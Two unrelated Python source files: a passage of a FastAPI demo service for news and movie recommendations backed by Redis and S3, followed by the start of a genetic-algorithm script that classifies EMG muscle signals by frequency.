'/api/v1/retrieve/'+user_id+'?recommendType='+recommend_type)
if httpResp.status_code != 200:
return response_failed({
"message": "Not support news type"
}, 400)
news_recommend_list = httpResp.json()['content']
    logging.info('news_recommend_list {}'.format(news_recommend_list))
refresh_user_click_data(user_id, news_recommend_list, '1', recommend_type, 'news')
retrieve_response = generate_news_retrieve_response(news_recommend_list)
return retrieve_response
# get the user's click history
@app.get('/api/v1/demo/click/{user_id}', tags=["demo"])
def click_get(user_id: str, pageSize: str, curPage: str):
logging.info("click_get enter")
page_size = int(pageSize)
cur_page = int(curPage)
click_list_info = get_user_click_list_info(user_id, page_size, cur_page, 'news')
return response_success({
"message": "click history by user_id: {}".format(user_id),
"totalItems": click_list_info['total_items'],
"curPage": cur_page,
"totalPage": click_list_info['total_page'],
"data": click_list_info['click_list']
})
@app.get('/api/v1/demo/movie/click/{user_id}', tags=["demo"])
def movie_click_get(user_id: str, pageSize: str, curPage: str):
    logging.info("movie_click_get enter")
page_size = int(pageSize)
cur_page = int(curPage)
click_list_info = get_user_click_list_info(user_id, page_size, cur_page, 'movie')
return response_success({
"message": "click history by user_id: {}".format(user_id),
"totalItems": click_list_info['total_items'],
"curPage": cur_page,
"totalPage": click_list_info['total_page'],
"data": click_list_info['click_list']
})
@app.post('/api/v1/demo/click', tags=["demo"])
def click_post(clickRequest: ClickRequest):
logging.info("click_post enter")
user_id = clickRequest.userId
item_id = clickRequest.itemId
logging.info("user_id:{}, item_id:{}".format(user_id, item_id))
user_click_count = add_user_click_info(user_id, item_id)
click_one_to_portrait(user_id, item_id)
click_hist_to_recall(user_id, item_id, user_click_count)
return response_success({
"message": "clicked item_id: {}".format(item_id)
})
@app.get('/api/v1/demo/portrait/userid/{user_id}', tags=["demo"])
def portrait_get(user_id: str):
logging.info("portrait_get enter")
logging.info('user_id -> %s', user_id)
httpResp = requests.get(
MANDATORY_ENV_VARS['EVENT_SERVICE_ENDPOINT']+'/api/v1/event/portrait/'+user_id)
if httpResp.status_code != 200:
return response_failed({
"message": "Not support news type"
}, 400)
portrait_data = httpResp.json()['content']
logging.info('portrait_data {}'.format(portrait_data))
return {"message": "success",
"data": portrait_data}
@app.post('/api/v1/demo/url', tags=["demo"])
def url_get(urlRequest: URLRequest):
headers = {
'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/87.0.4280.141 Safari/537.36 Edg/87.0.664.75',
'Host': 'www.baidu.com',
'upgrade-insecure-requests': '0',
'sec-fetch-dest': 'document',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,'
'application/signed-exchange;v=b3;q=0.9 '
}
title_b64 = urlRequest.title
decoded_bytes = base64.b64decode(title_b64)
title_str = str(decoded_bytes, "utf-8")
logging.info("search: {}".format(title_str))
try:
url = search_by_title(title_str, headers, 10)
except Exception as e1:
logging.error(repr(e1))
url = ''
random_url_list = [
'https://baijiahao.baidu.com/s?id=1690715424093912615&wfr=spider&for=pc',
'https://baijiahao.baidu.com/s?id=1690666081179071313&wfr=spider&for=pc',
'https://baijiahao.baidu.com/s?id=1690689899754648251&wfr=spider&for=pc',
'https://baijiahao.baidu.com/s?id=1690657878159643108&wfr=spider&for=pc',
'https://baijiahao.baidu.com/s?id=1690723015618951721&wfr=spider&for=pc',
'https://baijiahao.baidu.com/s?id=1690633677458149226&wfr=spider&for=pc',
'https://baijiahao.baidu.com/s?id=1690664720265254989&wfr=spider&for=pc',
'https://baijiahao.baidu.com/s?id=1690689899754648251&wfr=spider&for=pc',
'https://baijiahao.baidu.com/s?id=1690665452297691041&wfr=spider&for=pc',
'https://baijiahao.baidu.com/s?id=1690657878159643108&wfr=spider&for=pc',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_10036081365139924887%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9821107029074050546%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9264994315553468968%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_10001786768465709073%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9475883012444359813%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9862364227218649344%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9664070672349907696%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9039212282786529445%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9192155174958843101%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9793602629771651632%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9725620345608597043%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9939917266435866080%22%7D'
'&n_type=0&p_from=1'
]
logging.info(f"url: {url}")
if not url:
logging.warning("give a random url")
url = random_url_list[random.randint(0, len(random_url_list) - 1)]
return response_success({
"url": url
})
def search_by_title(title, headers, timeout):
url = "http://www.baidu.com/s"
if len(title) > 32:
title = title[: 32]
logging.info("search_by_title:'{}'".format(title))
params = {"wd": title, "cl": 3, "ie": "utf-8"}
try:
try_count = 0
while try_count < 10:
res = requests.get(url, params=params, headers=headers,
timeout=timeout, allow_redirects=True)
logging.info("res.status_code: {}, try_count:{}, res.text size: {}".format(res.status_code, try_count,
len(res.text)))
soup = BeautifulSoup(res.text, 'html.parser')
try_count = try_count + 1
if is_success_code(res.status_code) and len(soup.text.strip()) > 0:
break
logging.info("now sleep 1 sec ...")
time.sleep(1)
except ConnectTimeout as e:
logging.error(repr(e))
logging.error("request to '{}' timeout".format(url))
return ''
if not is_success_code(res.status_code):
logging.error(
"request fail to www.baidu.com, status_code:{}".format(res.status_code))
return ''
content_left = soup.select("#content_left")
if not content_left:
logging.info("抱歉没有找到 ...")
logging.info("res.text:{}".format(res.text.strip()))
return ""
logging.info("content_left div size={}".format(len(content_left)))
url = ''
try:
content_left_div = content_left[0]
all_links = content_left_div.find_all('a')
url = find_first_link(all_links)
except Exception as e:
logging.error("title:{}".format(title))
logging.error(repr(e))
return url
def find_first_link(the_links):
for link in the_links:
if 'href' in link.attrs:
href = link.attrs['href']
if href.startswith('http://www.baidu.com/link?url='):
return href
def is_success_code(status_code):
return status_code in [200, 201, 202, 203, 204, 205, 206, 209, 210]
def mock_item_detail():
item_detail_data = {
"id": "6552368441838272771",
"title": "Title for mock",
"url": "www.baidu.com"
}
return response_success({
"message": "mock news detail for news_id: {}".format("6552368441838272771"),
"data": item_detail_data
})
@xasync
def init_news_records_data(type, path, file, key):
logging.info('start init_records_data')
p = Pool(1)
new_callback = partial(load_news_records_to_redis, type, key)
p.apply_async(func=download_file_from_s3,
args=(MANDATORY_ENV_VARS['S3_BUCKET'], path,
file, MANDATORY_ENV_VARS['LOCAL_DATA_FOLDER'],),
callback=new_callback)
p.close()
p.join()
@xasync
def init_movie_records_data(type, path, file, key):
logging.info('start init_movie_records_data')
p = Pool(1)
new_callback = partial(load_movie_records_to_redis, type, key)
p.apply_async(func=download_file_from_s3,
args=(MANDATORY_ENV_VARS['S3_BUCKET'], path,
file, MANDATORY_ENV_VARS['LOCAL_DATA_FOLDER'],),
callback=new_callback)
p.close()
p.join()
def load_news_records_to_redis(type, key, file):
try:
file_to_load = open(file, encoding='utf8')
except IOError as error:
raise error
for line in file_to_load:
array = line.strip().split('_!_')
if array[-1] != '':
rCache.load_data_into_hash(key, array[0], json.dumps({
'code': array[1],
'type': array[2],
'title': array[3],
'keywords': array[4],
'url': '-'
}).encode('utf-8'))
file_to_load.close()
    logging.info('Loading news records succeeded.')
def load_movie_records_to_redis(type, key, file):
try:
file_to_load = open(file, encoding='utf8')
except IOError as error:
raise error
for line in file_to_load:
array = line.strip().split('_!_')
if array[-1] != '':
rCache.load_data_into_hash(key, array[0], json.dumps({
'program_type': array[1],
'program_name': array[2],
'release_year': array[3],
'director': array[4],
'actor': array[5],
'category_property': array[6],
'language': array[7],
'ticket_num': array[8],
'score': array[9],
'level': array[10],
'new_series': array[11]
}).encode('utf-8'))
file_to_load.close()
    logging.info('Loading movie records succeeded.')
def download_file_from_s3(bucket, path, file, dest_folder):
logging.info('Download file - %s from s3://%s/%s ... ', file, bucket, path)
# Using default session
s3client = boto3.client('s3')
try:
s3client.download_file(bucket, path+file, dest_folder+file)
except botocore.exceptions.ClientError as error:
raise error
except botocore.exceptions.ParamValidationError as error:
raise ValueError(
'The parameters you provided are incorrect: {}'.format(error))
logging.info(
'Download file - %s from s3://%s/%s ... was success', file, bucket, path)
return dest_folder+file
def click_one_to_portrait(user_id, news_id):
url = MANDATORY_ENV_VARS['EVENT_SERVICE_ENDPOINT'] + \
'/api/v1/event/portrait/'+user_id
send_post_request(url, {
'clicked_item': {
'id': news_id
}
})
def click_hist_to_recall(user_id, news_id, user_click_count):
if user_click_count > 0 and user_click_count % TRIGGER_RECALL_WINDOW == 0:
trigger_recall_svc(user_id)
def trigger_recall_svc(user_id):
window = TRIGGER_RECALL_WINDOW
url = MANDATORY_ENV_VARS['EVENT_SERVICE_ENDPOINT'] + \
'/api/v1/event/recall/'+user_id
click_list = get_user_click_hist(user_id, window)
return send_post_request(url, {
'user_id': user_id,
'clicked_item_list': click_list
})
def get_user_click_hist(user_id, top_n):
redis_click_list = get_list_from_redis(
REDIS_KEY_USER_ID_CLICK_DICT, user_id)
logging.info('get user_click_hist {}'.format(redis_click_list))
news_id_list = [item for item in redis_click_list]
news_id_list.reverse()
result = []
for var in news_id_list[0:top_n]:
result.append({"id": var})
return result
def send_post_request(url, data):
logging.info("send POST request to {}".format(url))
logging.info("data: {}".format(data))
if MANDATORY_ENV_VARS['TEST'] == 'True':
return "Test Mode - ok"
headers = {'Content-type': 'application/json'}
r = requests.post(url, data=json.dumps(data), headers=headers)
logging.info("status_code: {}".format(r.status_code))
if r.status_code == 200:
return r.json()
else:
logging.error(r.text)
raise Exception(
"status_code: {}, error POST request {}".format(r.status_code, url))
def add_user_click_info(user_id, news_id):
logging.info("add_user_click_info, user_id: " +
user_id + ", news_id:" + news_id)
click_list = get_list_from_redis(REDIS_KEY_USER_ID_CLICK_DICT, user_id)
click_list.append(news_id)
set_value_to_redis(REDIS_KEY_USER_ID_CLICK_DICT, user_id, click_list)
logging.info("done set click_list to {} for {}, list size: {}".format(
REDIS_KEY_USER_ID_CLICK_DICT, user_id, len(click_list)))
update_item_click_action(user_id, news_id)
return len(click_list)
def get_list_from_redis(dict_name, key):
logging.info("get lsit {}[{}] from redis".format(dict_name, key))
list_bin = rCache.get_data_from_hash(dict_name, key)
if list_bin:
list_values = json.loads(binary_to_str(list_bin))
else:
list_values = []
logging.info("return {} items".format(len(list_values)))
return list_values
def update_item_click_action(user_id, news_id):
'''
field -> user_id_action_dict
key -> user_id
value -> [
{
news_id : 0
},
{
news_id : 1
}
]
'''
logging.info("update_item_click_action {}[{}] '{}' = 1".format(
user_id_action_dict, user_id, news_id))
    user_action = get_dict_from_redis(user_id_action_dict, user_id)
    if not user_action:
        # No impression record yet for this user; start an empty one so the
        # 'click_data' lookup below cannot fail on a first-time click.
        user_action = {'click_data': [], 'action_source': ''}
    click_data = user_action['click_data']
existed_id_flag = 0
for item in click_data:
if news_id in item:
item[str(news_id)] = "1"
existed_id_flag = 1
break
if existed_id_flag == 0:
user_action['click_data'].append({news_id: '1'})
logging.info('after user_action update: {}'.format(user_action))
set_value_to_redis(user_id_action_dict, user_id, user_action)
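# Worked example (ours) of the flag flip above. Before a click the impression
# record holds '0' for every recommended item:
#   {'click_data': [{'n1': '0'}, {'n2': '0'}], 'action_source': 'recommend'}
# after update_item_click_action(user_id, 'n2') the matching entry becomes:
#   {'click_data': [{'n1': '0'}, {'n2': '1'}], 'action_source': 'recommend'}
# (item ids 'n1'/'n2' are hypothetical.)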
def get_user_click_list_info(user_id, page_size, cur_page, scenario):
redis_click_list = get_list_from_redis(
REDIS_KEY_USER_ID_CLICK_DICT, user_id)
logging.info('redis_click_list: {}'.format(redis_click_list))
item_id_list_all = redis_click_list
item_id_list_all.reverse()
total_items = len(item_id_list_all)
total_page = math.ceil(total_items / int(page_size))
from_index = page_size * cur_page
to_index = page_size * (cur_page + 1)
page_item_id = item_id_list_all[from_index:to_index]
click_list = []
if scenario == 'news':
click_list = [get_item_by_id(news_id) for news_id in page_item_id]
elif scenario == 'movie':
click_list = [get_movie_by_id(movie_id) for movie_id in page_item_id]
else:
logging.info("scenario {} is not supported!")
logging.info(
"get_user_click_list_info return click_list size: {}".format(len(click_list)))
return {
"click_list": click_list,
"total_items": total_items,
"total_page": total_page
}
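# Worked example (ours) of the pagination above: with 25 click records,
# page_size=10 and cur_page=1, the slice is items[10:20] and
# total_page = ceil(25 / 10) = 3. The list is reversed first, so page 0
# always holds the most recent clicks.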
def get_item_by_id(item_id):
logging.info("get_item_by_id start")
news_detail_record = json.loads(rCache.get_data_from_hash(
news_records_dict, item_id), encoding='utf-8')
logging.info('news id {} news_detail_record {}'.format(
item_id, news_detail_record))
return {
'id': item_id,
'title': news_detail_record['title'],
'url': 'www.baidu.com' # TODO
}
def get_movie_by_id(item_id):
logging.info("get_movie_by_id start")
movie_detail_record = json.loads(rCache.get_data_from_hash(
movie_records_dict, item_id), encoding='utf-8')
logging.info('movie id {} movie_detail_record {}'.format(item_id, movie_detail_record))
s3_bucket = MANDATORY_ENV_VARS['S3_BUCKET']
s3_prefix = MANDATORY_ENV_VARS['S3_PREFIX']
aws_region = MANDATORY_ENV_VARS['AWS_REGION']
return {
'id': item_id,
'image': 'https://{}.s3-{}.amazonaws.com/{}/movielens-posters/img/{}.jpg'.format(s3_bucket, aws_region, s3_prefix, item_id),
'title': movie_detail_record['program_name'],
'release_year': movie_detail_record['release_year'],
'director': movie_detail_record['director'],
'actor': movie_detail_record['actor'],
'category_property': movie_detail_record['category_property'],
'new_series': movie_detail_record['new_series'],
'level': movie_detail_record['level'],
'desc': '{}'.format(item_id),
'type': movie_detail_record['program_type']
}
def get_item_detail_response(news_id):
logging.info("get_item_detail_response start")
news_detail_record = json.loads(rCache.get_data_from_hash(
news_records_dict, news_id), encoding='utf-8')
logging.info('news id {} news_detail_record {}'.format(
news_id, news_detail_record))
data = {
'id': news_id,
'title': news_detail_record['title'],
'url': 'www.baidu.com'
}
return response_success({
"message": "news {} detail success".format(news_id),
"data": data
})
def generate_news_retrieve_response(new_recommend_list):
retrieve_data = []
for element in new_recommend_list:
news_detail_record = json.loads(rCache.get_data_from_hash(
news_records_dict, element['id']), encoding='utf-8')
logging.info('news id {} news_detail_record {}'.format(
element['id'], news_detail_record))
data = {
'id': element['id'],
'image': 'https://inews.gtimg.com/newsapp_bt/0/13060844390/1000', # TODO
'title': news_detail_record['title'],
'desc': '{}'.format(element['id']), # TODO
'type': news_detail_record['type'],
'tag': element['tags']
}
retrieve_data.append(data)
return response_success({
"message": "retrieve news list success",
"totalItems": len(new_recommend_list),
"curPage": 0,
"totalPage": 1,
"data": retrieve_data
})
def generate_movie_retrieve_response(movie_recommend_list):
retrieve_data = []
s3_bucket = MANDATORY_ENV_VARS['S3_BUCKET']
s3_prefix = MANDATORY_ENV_VARS['S3_PREFIX']
aws_region = MANDATORY_ENV_VARS['AWS_REGION']
for element in movie_recommend_list:
movie_detail_record = json.loads(rCache.get_data_from_hash(
movie_records_dict, element['id']), encoding='utf-8')
logging.info('movie id {} movie_detail_record {}'.format(
element['id'], movie_detail_record))
data = {
'id': element['id'],
'image': 'https://{}.s3-{}.amazonaws.com/{}/movielens-posters/img/{}.jpg'.format(s3_bucket, aws_region, s3_prefix, element['id']),
'title': movie_detail_record['program_name'],
'release_year': movie_detail_record['release_year'],
'director': movie_detail_record['director'],
'actor': movie_detail_record['actor'],
'category_property': movie_detail_record['category_property'],
'new_series': movie_detail_record['new_series'],
'level': movie_detail_record['level'],
'desc': '{}'.format(element['id']),
'type': movie_detail_record['program_type'],
'tag': element['tags']
}
retrieve_data.append(data)
return response_success({
"message": "retrieve news list success",
"totalItems": len(movie_recommend_list),
"curPage": 0,
"totalPage": 1,
"data": retrieve_data
})
def refresh_user_click_data(user_id, items_recommend_list, action_type, action_source, scenario):
logging.info('refresh_user_click_data start')
store_previous_click_data(user_id, action_type, scenario)
new_click_data = generate_new_click_data(
items_recommend_list, action_source)
if rCache.load_data_into_hash(user_id_action_dict, user_id, json.dumps(new_click_data).encode('utf-8')):
logging.info(
'Save user_id_action_dict into Redis with key : %s ', user_id)
logging.info('refresh_user_click_data completed')
def response_failed(body, code):
return JSONResponse(status_code=code, content=body)
def mock_news_retrieve_response():
retrieve_data = []
count = 0
while (count < 20):
retrieve_data.append(get_item_by_id("6552368441838272771"))
count = count + 1
return response_success({
"message": "mock retrieve news list",
"totalItems": 100,
"curPage": 0,
"totalPage": 1,
"data": retrieve_data
})
def mock_movie_retrieve_response():
retrieve_data = []
count = 0
while (count < 20):
retrieve_data.append(get_item_by_id("movie test id"))
count = count + 1
return response_success({
"message": "mock retrieve movie list",
"totalItems": 100,
"curPage": 0,
"totalPage": 1,
"data": retrieve_data
})
def generate_new_click_data(items_recommend_list, action_source):
new_click_data = []
for element in items_recommend_list:
new_click_data.append({element['id']: '0'})
final_click_data = {
'click_data': new_click_data,
'action_source': action_source
}
logging.info(
'generate_new_click_data completed {}'.format(final_click_data))
return final_click_data
def store_previous_click_data(user_id, action_type, scenario):
logging.info('store_previous_click_data start')
user_id_click_data_redis = rCache.get_data_from_hash(
user_id_action_dict, user_id)
if not bool(user_id_click_data_redis):
return
user_id_click_data = json.loads(user_id_click_data_redis, encoding='utf-8')
logging.info('previous click data {}'.format(user_id_click_data))
action_source = user_id_click_data['action_source']
click_data = user_id_click_data['click_data']
logging.info('previous click data action_source {}'.format(action_source))
current_timestamp = str(calendar.timegm(time.gmtime()))
s3_body = ''
connector = '_!_'
action_source_code = '0'
for element in click_data:
temp_array = []
# k is item id, v is action 0/1
for k, v in element.items():
temp_array.append(user_id)
temp_array.append(k)
temp_array.append(current_timestamp)
temp_array.append(action_type)
temp_array.append(v)
if action_source_code == '0':
action_source_code = get_action_source_code(action_source, k, scenario)
temp_array.append(action_source_code)
s3_body = s3_body + connector.join(temp_array) + '\n'
logging.info("store_previous_click_data data{} ".format(s3_body))
s3client = boto3.resource('s3')
if s3_body != '':
s3client.Bucket(MANDATORY_ENV_VARS['CLICK_RECORD_BUCKET']).put_object(
Key=MANDATORY_ENV_VARS['CLICK_RECORD_FILE_PATH'] + 'action_' + user_id + '_' + current_timestamp + '.csv',
Body=s3_body)
logging.info('store_previous_click_data completed')
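# Worked example (ours) of one action row assembled above; fields are joined
# with the '_!_' connector as
#   user_id _!_ item_id _!_ timestamp _!_ action_type _!_ clicked(0/1) _!_ source
# e.g. "u123_!_n456_!_1610000000_!_1_!_0_!_1" (all values hypothetical).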
def get_action_source_code(action_source, item_id, scenario):
if action_source == 'recommend':
return '1'
else:
if scenario == 'news':
news_detail_record = json.loads(rCache.get_data_from_hash(
news_records_dict, item_id), encoding='utf-8')
logging.info('get item detail {}'.format(news_detail_record))
# e.g. 106, 107..
return news_detail_record['code']
else:
# e.g. 'action' or 'crime', movie type
return action_source
def get_user_id_by_name(user_name):
user_info_dict = get_dict_from_redis(REDIS_KEY_USER_LOGIN_DICT, user_name)
if user_info_dict:
return user_info_dict['user_id']
logging.info("Cannot find user_id by name: {}".format(user_name))
return ''
def login_new_user(user_name, user_id):
set_value_to_redis(REDIS_KEY_USER_LOGIN_DICT, user_name, {
"user_id": user_id,
"visit_count": 0,
"click_count": 0
})
def increase_visit_count(user_name):
user_info_dict = get_dict_from_redis(REDIS_KEY_USER_LOGIN_DICT, user_name)
new_count = user_info_dict['visit_count'] + 1
user_info_dict['visit_count'] = new_count
set_value_to_redis(REDIS_KEY_USER_LOGIN_DICT, user_name, user_info_dict)
logging.info("user_name:{}, visit_count: {}".format(user_name, new_count))
return new_count
def set_value_to_redis(dict_name, key, value):
rCache.load_data_into_hash(dict_name, key, json.dumps(value))
def get_dict_from_redis(dict_name, key):
logging.info("get dict {}[{}] from redis".format(dict_name, key))
val_bin = rCache.get_data_from_hash(dict_name, key)
if val_bin:
val_dict = json.loads(binary_to_str(val_bin))
else:
val_dict = {}
logging.info("return {}".format(len(val_dict)))
return val_dict
def response_success(body):
return body
def binary_to_str(bin_str):
return bin_str.decode('utf-8')
# movie
@app.get('/api/v1/demo/movie', tags=["demo"])
def get_recommend_movie(userId: str, type: str, curPage: str, pageSize: str):
logging.info('Start demo->get_recommend_movie()...')
logging.info('user_id -> %s', userId)
logging.info('recommend_type -> %s', type)
user_id = userId
recommend_type = type
if user_id == 'magic-uuid':
        return mock_movie_retrieve_response()
logging.info('recommend movie list to user')
# get from retrieve
httpResp = requests.get(MANDATORY_ENV_VARS['RETRIEVE_SERVICE_ENDPOINT'] +
'/api/v1/retrieve/'+user_id+'?recommendType='+recommend_type)
if httpResp.status_code != 200:
return response_failed({
"message": "Not support news type"
}, 400)
movie_recommend_list = httpResp.json()['content']
logging.info('movie_recommend_list {}'.format(movie_recommend_list))
refresh_user_click_data(user_id, movie_recommend_list, '1', recommend_type, 'movie')
retrieve_response = generate_movie_retrieve_response(movie_recommend_list)
return retrieve_response
@app.post('/api/v1/demo/start_train', tags=["demo"])
def start_train_post(trainReq: TrainRequest):
logging.info('demo start_train_post start! change type: {}'.format(
trainReq.change_type))
if trainReq.change_type not in ['MODEL', 'CONTENT', 'ACTION']:
raise HTTPException(status_code=405, detail="invalid change_type")
url = MANDATORY_ENV_VARS['EVENT_SERVICE_ENDPOINT'] + \
'/api/v1/event/start_train'
result = send_post_request(url, {
'change_type': trainReq.change_type
})
logging.info('executionArn: {}'.format(result['executionArn']))
response = {
"message": "Start train success",
"data": result
}
return response
@app.get('/api/v1/demo/offline_status/{executionArn}', tags=["demo"])
def offline_status(executionArn: str):
logging.info("offline_status start, executionArn {}".format(executionArn))
httpResp = requests.get(
MANDATORY_ENV_VARS['EVENT_SERVICE_ENDPOINT']+'/api/v1/event/offline_status/'+executionArn)
if httpResp.status_code != 200:
return response_failed({
"message": "Error"
}, 400)
result = httpResp.json()['status']
logging.info('result {}'.format(result))
return result
def init():
# Check out environments
for var in MANDATORY_ENV_VARS:
if var not in os.environ:
logging.error(
"Mandatory variable {%s} is not set, using default value {%s}.", var, MANDATORY_ENV_VARS[var])
else:
MANDATORY_ENV_VARS[var] = os.environ.get(var)
# Initial redis connection
global rCache
rCache = cache.RedisCache(
host=MANDATORY_ENV_VARS['REDIS_HOST'], port=MANDATORY_ENV_VARS['REDIS_PORT'])
logging.info('redis status is {}'.format(rCache.connection_status()))
logging.info('demo service start')
if __name__ == "__main__":
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
init()
    # Environment overrides arrive as strings, so coerce the port to int.
    uvicorn.run(app, host="0.0.0.0", port=int(MANDATORY_ENV_VARS['DEMO_PORT']))
|
AGv7.py
|
# -*- coding: utf-8 -*-
"""
Created on Fri Aug 24 09:40:28 2018
@author: Paulo Augusto
"""
import numpy as np
#from numpy import fft
import matplotlib.pyplot as plt
#import scipy.signal as sig
import os
import random
import emgReaderClass_v2 as erc
import threading
import multiprocessing
import dataPlotter
# This script is compatible with 'emgReaderClass_v2', that
# reads the .csv files generated by 'movementSaver.m', from
# the folder './csv/'
bias=0 # If bias = 1, every chromosome will have a non-frequency-dependent DNA entry
maxGen=3000 # The max number of generations
startOver=True # If True, the code will not consider the last simulation
tamPop=500 # Population number
maxFreq=200 # This is the max Frequency to consider #240
freqStep=2 # For freqStep=3 -> the code will bin frequencies as [1,2,3],[4,5,6], etc# 3
taxaMut=0.01 # The mutation rate
taxaMutMin=0.01 # Minimum mutation rate
taxaMutMax=10.0 # Maximum mutation rate
chanceMut=20 # The chance of mutation (only for the "absolute" mutation)
bestTypes=[] # Logging variable
continuous=False # If True, the code will use a continuous fitness function (not recommended)
binaryFit=False # If True, the fitness of each individual will be 1 for each right guess
# If False, it will be continuous if "continuous" is True, or 1 point if
# it guesses correctly, and 1.5 if it guesses with a confidence above
# a "multFac" threshold
multFac=1.5 #
binaryCrossChance=0.5 # The chance of performing a binary crossover. 1 minus this
# is the chance of a mean crossover
vectorialMutationChance=0.5 # The chance of a vectorial mutation. 1 minus this is
# the chance of an absolute mutation
taxaMutMult=4.0 # The factor by which taxaMut will be multiplied
sourceType='ninapro'
fs=2000
##############################################################################
guid=0 # Individual ID (logging variable)
real=[] # DATA
origin=[] # DATA
fv=[] # DATA
frv=[] # DATA
nArq=0 # DATA
# lastValues, botThs and topThs to be used in each archive
parameters={'bicepsinteiro.txt': [400,20,10],\
'bicepsmetade.txt': [400,20,10],\
'emgwk.txt': [400,20,10],\
'emgmed.txt':[400,20,10],\
# 'xoxoxo.txt':[300,40,30],\
'emgabrindo.txt':[500,20,20],\
'emgapertando.txt':[400,20,20]}
# Method that return the number of right guesses of and individual
def countGuesses(indiv):
arqVec=getArqs()
score=0
for arq in range(0,nArq):
for i in range(0,len(real[arq])):
tam=len(real[arq][i])
x= getFreqVector(fv[arq][i])
x=np.array(x)
pont=x*indiv.cromo.freqFactor
# test.append(pont)
if np.argmax(pont[0]) == arq:
score+=1
return score
# This function just multiplies the chromosome of an individual by the frequency
# vector of a signal and returns the result. The position that gets the highest
# number represents the archive it thinks the signal belongs to
def sayWho(indiv,real,fv):
tam=len(fv)
x= getFreqVector(fv)
x=np.array(x)
pont=x*indiv.cromo.freqFactor
return pont
# Gets the *.txt files
def getArqs():
arqVec=[]
for arq in os.listdir('.'):
if os.path.splitext(arq)[1]=='.txt':
arqVec.append(arq)
arqVec.reverse()
return arqVec
# Chromosome class. Each chromosome mainly consists of an nArqs x (maxFreq/freqStep)
# matrix. Each column represents an archive, and each line represents a set of
# freqStep frequencies
class cromossome:
def getRandomVec(self,n):
v=[]
for i in range(0,n):
v.append(random.random()*2-1)
return v
def __init__(self):
self.freqFactor=[]
n=nArq
        for i in range(0, maxFreq // freqStep + bias):  # integer division keeps range() valid on Python 3
self.freqFactor.append(self.getRandomVec(n))
self.freqFactor=np.matrix(self.freqFactor)
# Individual class
class ind:
def __init__(self):
global guid
self.uid=guid
guid+=1
self.cromo = cromossome()
self.fit=0
self.marker='none'
# This function takes the fft data of a signal and returns a similar vector,
# but instead of keeping one element per frequency it takes groups of freqStep
# frequencies, sums them and divides by freqStep
def getFreqVector(fv):
x=[]
tam=float(len(fv))
# for j in range(0,int(tam/2)-5):
# k=int(np.floor(float(j)*fs/tam))
# step=int(np.ceil(tam*freqStep/fs))
# if(k % step == 0):
# if len(x)==maxFreq/freqStep:
# ##### BIAS ######
# if bias==1:
# x.append(-1)
# #################
# break
# x.append(sum(fv[k:k+step+1])*2/tam)
# return x
norm=int(np.ceil(tam*1/fs))
step=freqStep*norm
for j in range(0,norm*maxFreq,step):
x.append(sum(fv[j:j+step])*2/tam)
##### BIAS ######
if bias==1 and j==step*maxFreq-1:
x.append(-1)
#################
return x
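# Worked example (ours): for a 2000-sample fft vector with fs=2000 and
# freqStep=2, norm = ceil(2000/2000) = 1 and step = 2, so each output bin is
# (fv[j] + fv[j+1]) * 2/2000 and the result has maxFreq/freqStep = 100 bins.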
# Read the data archives. The original signal is stored in origin. Each signal
# is stored in real: real[arq][5] contains the 5th signal of the arq'th file
# (as read by getArqs). The fft data is stored in "fv" (indexes work the
# same as for "real"). The frequency vector as returned by getFreqVector
# is stored in frv
def readArqs(source):
reader=erc.emgReader()
global real,fv,frv
if source=='bioplux':
for arq in range(0,nArq):
origin.append([])
real.append([])
fv.append([])
frv.append([])
reader.lastValues=parameters[arqVec[arq]][0]
reader.topThs=parameters[arqVec[arq]][1]
reader.botThs=parameters[arqVec[arq]][2]
origin[arq],real[arq],fv[arq] = reader.analyzeEmg(arqVec[arq],fs)
elif source=='ninapro':
real,fv=reader.getCsvData('bic')
real=real[0:12]
fv=fv[0:12]
for arq in range(0,len(real)):
frv.append([])
for i in range(0,len(fv[arq])):
frv[arq].append(getFreqVector(fv[arq][i]))
# Fitness method. Each signal's frequency vector is multiplied by the
# individual's chromosome. The resulting numbers are read as the score of
# each archive: if, say, the 0th element gets the largest number, the
# individual "thinks" that signal belongs to archive 0 (getArqs()[0]).
# The fitness is then calculated from the number of right guesses of the
# individual
def fitness(indiv):
global nArq
score=0
for arq in range(0,nArq):
for i in range(0,len(fv[arq])):
tam=len(real[arq][i])
pont=np.array(frv[arq][i])*indiv.cromo.freqFactor
# print pont
test=pont
if np.argmax(pont) == arq:
if not binaryFit:
###############################################################################
if continuous:
score+=(np.max(pont[0])-np.min(pont[0]))/np.mean(pont[0]-np.min(pont[0]))
###############################################################################
else:
if np.max(np.array(pont)) >=multFac*np.mean(np.array(pont)):
score+=1.5
else:
score+=1
###########################################################################
else:
score+=1
return score
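# Worked example (ours) of the scoring rule above with multFac=1.5: suppose
# pont = [0.1, 0.9, 0.2] for a signal from archive 1. argmax is 1 (a correct
# guess) and max 0.9 >= 1.5 * mean 0.4 = 0.6, so the guess earns 1.5 points
# instead of 1.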
# Population class
class population:
def __init__(self):
self.population=[]
